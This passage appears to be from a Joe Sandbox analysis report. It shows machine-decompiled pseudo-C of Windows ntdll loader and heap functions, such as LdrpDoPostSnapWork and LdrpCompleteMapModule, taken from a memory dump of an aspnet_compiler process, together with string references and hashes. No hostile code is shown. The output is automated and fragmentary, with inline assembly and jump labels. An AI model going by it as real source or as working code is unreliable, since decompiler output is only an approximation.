				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0125934A() != 0) {
								_t159 = E012CA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1335780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E012C5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1335780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0125849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01258999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01258999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1335c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1335c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01262280(_t92, 0x13386cc);
															_t94 = E01319DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E012761A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1335c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01258A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1335c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1335c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0128F380(_t136, 0x1221184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01262280(_t108, 0x13386cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E012761A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01319D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0125FFB0(_t118, _t156, 0x13386cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01289A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01258799
0x0125879d
0x012587a1
0x012587a3
0x012587a8
0x012587c3
0x012587c3
0x012587c8
0x012587d1
0x012587d4
0x012587d8
0x012587e5
0x012587ec
0x012a9bfe
0x012a9c00
0x012a9c02
0x012a9c08
0x012a9c0d
0x012a9c0f
0x012a9c14
0x012a9c2d
0x012a9c32
0x012a9c37
0x012a9c3a
0x012a9c3c
0x012a9c42
0x012a9c42
0x012a9c3c
0x012a9c02
0x012587da
0x012587df
0x012587e3
0x00000000
0x00000000
0x012587e3
0x012587f2
0x00000000
0x012587fb
0x012587fd
0x012587fe
0x0125880e
0x0125880f
0x01258810
0x01258814
0x0125881a
0x0125881c
0x0125881f
0x01258821
0x01258822
0x01258824
0x01258826
0x0125882c
0x0125882e
0x012a9c48
0x012a9c48
0x01258834
0x01258834
0x01258837
0x00000000
0x00000000
0x01258837
0x0125882e
0x0125883d
0x01258840
0x01258843
0x01258846
0x01258849
0x0125884c
0x0125884e
0x01258850
0x01258852
0x01258854
0x01258857
0x012588b4
0x012588b6
0x012588b6
0x01258859
0x01258859
0x01258859
0x01258861
0x01258866
0x0125886a
0x0125893d
0x01258941
0x00000000
0x01258947
0x01258947
0x0125894a
0x0125894c
0x00000000
0x01258952
0x01258955
0x0125895a
0x0125895d
0x0125895d
0x0125895f
0x01258961
0x01258961
0x01258968
0x00000000
0x00000000
0x0125896a
0x0125896b
0x0125896e
0x00000000
0x01258970
0x01258970
0x01258970
0x01258970
0x01258972
0x01258972
0x01258974
0x00000000
0x0125897a
0x0125897a
0x0125897d
0x00000000
0x01258983
0x012a9c65
0x012a9c6d
0x012a9c72
0x012a9c75
0x012a9c75
0x012a9c82
0x012a9c86
0x012a9c87
0x012a9c88
0x012a9c89
0x012a9c8c
0x012a9c90
0x012a9c95
0x012a9c97
0x012a9ca0
0x012a9ca3
0x012a9ca9
0x012a9ca9
0x00000000
0x012a9ca9
0x012a9ca3
0x00000000
0x012a9c97
0x0125897d
0x00000000
0x01258974
0x01258988
0x01258992
0x01258996
0x00000000
0x01258996
0x0125894c
0x00000000
0x01258870
0x0125887b
0x0125887d
0x0125887f
0x01258881
0x01258884
0x01258884
0x01258886
0x01258889
0x0125888c
0x0125888e
0x01258891
0x01258891
0x01258898
0x00000000
0x00000000
0x0125889a
0x0125889b
0x0125889e
0x00000000
0x00000000
0x012588a0
0x012588a8
0x012588b0
0x012588b2
0x012588d3
0x012588d5
0x00000000
0x012588d7
0x012588db
0x012588dc
0x012588e0
0x012588e8
0x012588ee
0x012588f0
0x012588f3
0x012588fc
0x01258901
0x01258906
0x0125890c
0x0125890c
0x0125890f
0x01258916
0x01258917
0x01258918
0x01258919
0x0125891a
0x0125891f
0x01258921
0x012a9c52
0x012a9c55
0x012a9c5b
0x012a9cac
0x012a9cc0
0x012a9cc0
0x012a9c55
0x01258927
0x01258927
0x0125892f
0x01258933
0x00000000
0x012588f5
0x012588f5
0x00000000
0x012588f7
0x012588f7
0x012588fa
0x00000000
0x00000000
0x00000000
0x00000000
0x012588fa
0x012588f5
0x012588f3
0x00000000
0x012588d5
0x00000000
0x012588b2
0x012588c9
0x00000000
0x012588c9
0x0125887f
0x0125886a
0x01258857
0x01258852
0x012588bf
0x012588bf
0x012587aa
0x012587ad
0x012587ae
0x012587b4
0x012587b5
0x012587b6
0x012587b8
0x012587bd
0x012587c1
0x012587f4
0x012587fa
0x00000000
0x00000000
0x00000000
0x012587c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 012A9C28
LdrpDoPostSnapWork, xrefs: 012A9C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 012A9C18

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 383a808bf92ab9d33ca59c458380fc1ea5d1c52e79675da2e3e0c6f20fa7b2f2
Instruction ID: b52fd3a664dbf502fd5bd0d780d3aa87decfcfa224280201e7defc60f1242611
Opcode Fuzzy Hash: 383a808bf92ab9d33ca59c458380fc1ea5d1c52e79675da2e3e0c6f20fa7b2f2
Instruction Fuzzy Hash: FD910231A2021BEBEF98DF5AD4C5ABAB7B5FF44314F444169DE01AB240E7B0E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01257E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01257E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0125CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0124C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1335780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E012C5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1335780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01267D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01267D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E012C7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01267D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01267D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E012C7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0127A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0124B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01257e4c
0x01257e50
0x01257e55
0x01257e58
0x01257e5d
0x01257e71
0x01257f33
0x01257e77
0x01257e77
0x01257e79
0x01257e79
0x01257e7e
0x01257f45
0x012a9848
0x00000000
0x012a9848
0x01257f4e
0x01257f53
0x01257f5a
0x00000000
0x00000000
0x012a985a
0x012a9862
0x012a9866
0x00000000
0x012a986c
0x00000000
0x012a986c
0x01257e84
0x01257e84
0x01257e8d
0x012a9871
0x01257eb8
0x01257ec0
0x01257ec0
0x01257e9a
0x012a987e
0x00000000
0x00000000
0x012a9884
0x012a988b
0x012a98a7
0x012a98ac
0x012a98b1
0x012a98b6
0x012a98b8
0x012a98b8
0x012a98b9
0x00000000
0x012a98b9
0x01257ea0
0x01257ea7
0x00000000
0x00000000
0x01257eac
0x01257eb1
0x01257ec6
0x01257ed0
0x012a98cc
0x01257ed6
0x01257ed6
0x01257ed6
0x01257ede
0x01257ee3
0x012a98e3
0x012a98f0
0x012a9902
0x012a98f2
0x012a98fb
0x012a98fb
0x012a9907
0x012a991d
0x012a991d
0x012a9907
0x012a98e3
0x01257ef0
0x01257f14
0x01257f14
0x01257f1e
0x012a9946
0x01257f24
0x01257f24
0x01257f24
0x01257f2c
0x012a996a
0x012a9975
0x012a9975
0x012a997e
0x012a9993
0x012a9993
0x012a997e
0x00000000
0x01257ef2
0x01257efc
0x01257f0a
0x01257f0e
0x012a9933
0x00000000
0x012a9933
0x00000000
0x01257f0e
0x00000000
0x00000000
0x00000000
0x01257eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 012A9891
minkernel\ntdll\ldrmap.c, xrefs: 012A98A2
LdrpCompleteMapModule, xrefs: 012A9898

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 4565b596ae3f73aee7f892919c381092e064538d84b53503f30ee3a30058aa06
Instruction ID: 0670b8d5fee2a02d7d041853a016cd6a4ff6924131e08895886d5fd03eb27ab3
Opcode Fuzzy Hash: 4565b596ae3f73aee7f892919c381092e064538d84b53503f30ee3a30058aa06
Instruction Fuzzy Hash: 80510031670742DFEB22CB6DC984B2A7BE4AB00718F8406A9EE519B3D1D774ED40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0124E620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0124E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0124F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E012895D0();
						}
						if(_t78 != 0) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0128FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0128BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01289600();
					if(_t97 < 0) {
						goto L6;
					}
					E0128BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0124F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0128BB40(_t83, _t102 + 0x24, _t78);
								if(L012543C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0128BB40(_t84, _t102 + 0x24, _t94);
									if(L012543C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0124e620
0x0124e628
0x0124e62f
0x0124e631
0x0124e635
0x0124e637
0x0124e63e
0x012a5503
0x012a5503
0x0124e64c
0x0124e64c
0x0124e651
0x00000000
0x00000000
0x0124e661
0x0124e665
0x012a542a
0x0124e715
0x0124e71a
0x0124e71c
0x0124e720
0x0124e720
0x0124e727
0x0124e736
0x0124e736
0x0124e743
0x0124e743
0x0124e673
0x0124e678
0x0124e67d
0x0124e682
0x0124e685
0x0124e692
0x0124e69b
0x0124e6a3
0x0124e6ad
0x0124e6b1
0x0124e6b2
0x0124e6bb
0x0124e6bf
0x0124e6c0
0x0124e6c8
0x0124e6cc
0x0124e6d5
0x0124e6d9
0x00000000
0x00000000
0x0124e6e5
0x0124e6ea
0x0124e6f9
0x0124e70b
0x0124e70f
0x012a5439
0x012a545e
0x012a545e
0x00000000
0x012a545e
0x012a543b
0x012a543e
0x012a5440
0x012a5445
0x012a5472
0x012a5475
0x012a548d
0x012a5493
0x012a54a9
0x00000000
0x00000000
0x012a54ab
0x012a54b4
0x012a54bc
0x012a54c8
0x012a54de
0x012a54fb
0x012a54e0
0x012a54e6
0x012a54eb
0x012a54eb
0x012a54de
0x00000000
0x012a54bc
0x012a5477
0x012a547a
0x012a5480
0x012a5483
0x012a5486
0x012a548b
0x00000000
0x00000000
0x00000000
0x012a548b
0x00000000
0x00000000
0x00000000
0x00000000
0x012a5447
0x012a5447
0x012a5447
0x012a5447
0x012a544e
0x00000000
0x00000000
0x012a5450
0x012a5452
0x012a5455
0x012a545a
0x00000000
0x00000000
0x00000000
0x012a545c
0x012a546a
0x012a546d
0x012a546f
0x00000000
0x012a546f
0x0124e70f

Strings

@, xrefs: 0124E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0124E68C
InstallLanguageFallback, xrefs: 0124E6DB

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: fb19574ae9f83a4d8898aea070ffaa5f8507bf82dbe407690174948aaf42314a
Instruction ID: b987effc0eb4808235e4ab86a75bf70aa2ee94da4ea8ec9bd061c34b524f1636
Opcode Fuzzy Hash: fb19574ae9f83a4d8898aea070ffaa5f8507bf82dbe407690174948aaf42314a
Instruction Fuzzy Hash: 9A51BD726293469BD719EF28C440A7BB7E8FF88714F45092EFA85D7250F734DA0487A2

Uniqueness

Uniqueness Score: -1.00%

Function 0130E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0130E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0130BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0130BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0130AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01289730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0130A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0130A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01289730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0130A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0130A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01262280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0125B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0125FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01267D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E012FFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0130e547
0x0130e549
0x0130e54f
0x0130e553
0x0130e557
0x0130e55a
0x0130e55c
0x0130e55f
0x0130e561
0x0130e567
0x0130e56b
0x0130e7e2
0x00000000
0x0130e571
0x0130e575
0x0130e577
0x0130e57b
0x0130e57c
0x0130e57d
0x0130e57e
0x0130e57f
0x0130e588
0x0130e58f
0x0130e591
0x0130e592
0x0130e592
0x0130e596
0x0130e59e
